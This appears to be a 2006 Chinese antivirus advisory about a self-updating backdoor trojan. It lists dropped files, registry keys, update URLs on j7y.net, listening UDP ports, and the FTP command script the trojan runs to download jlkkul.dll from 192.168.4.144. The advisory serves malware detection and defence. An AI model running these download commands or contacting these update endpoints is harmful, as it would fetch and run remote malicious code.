病毒信息

病毒行为

病毒信息

病毒别名： 处理时间：2006-12-08 威胁级别：★

中文名称： 病毒类型：黑客程序 影响系统：Win 9x/ME,Win 2000/NT,Win XP,Win 2003

病毒行为

该病毒是一个会自动在线更新的后门程序。该病毒会在系统留下后门供黑客控制感染机器。建议电脑用户升级病毒库及打开防火墙，以免中毒受害。

1、生成的文件

C:\\WINNT\\system32\\wbem\\winlogon.exe

C:\\WINNT\\system32\\wmvdmoes32.dll

C:\\WINNT\\system32\\wbem\\SysOption.bin

C:\\WINNT\\system32\\AddrConfig.bin

C:\\WINNT\\system32\\wbem\\kbd101ab.dll

C:\\WINNT\\system32\\wbem\\ddes\\BoExplorer.rar

C:\\WINNT\\system32\\wbem\\ddes\\DownBoExplorer.rar

C:\\WINNT\\system32\\x

2、

HKCR\\TypeLib\\{F63B08CD-3645-474F-8872-BA4293251FF9}\\1.0\\0\\win32

(Default)

"C:\\WINNT\\system32\\wbem\\winlogon.exe"

HKCR\\CLSID\\{881F6F06-4620-4070-AD05-BD77D4C56661}\\TypeLib

(Default)

"{F63B08CD-3645-474F-8872-BA4293251FF9}"

3、

HKCR\\CLSID\\{881F6F06-4620-4070-AD05-BD77D4C56661}

(Default)

"SysBackHelper Object"

HKCR\\CLSID\\{881F6F06-4620-4070-AD05-BD77D4C56661}\\LocalServer32

(Default)

"C:\\WINNT\\system32\\wbem\\winlogon.exe"

4、下载http://upcfg.j7y.net/upcfg/Newdownurl.txt文本取得在线更新地址列表。

5、在线更新地址列表

http://update.j7y.net/NewUpdate/

http://down1.j7y.net/NewUpdate/

http://down2.j7y.net/NewUpdate/

6、该病毒会调用ftp程序执行文件x指令，如下：

-------------------------------------------

open 192.168.4.144 7313

user netapi x

bin

get jlkkul.dll

bye

-------------------------------------------

7、该病毒开启6100及10**两个UDP端口，接收黑客输入指令和收集用户信息。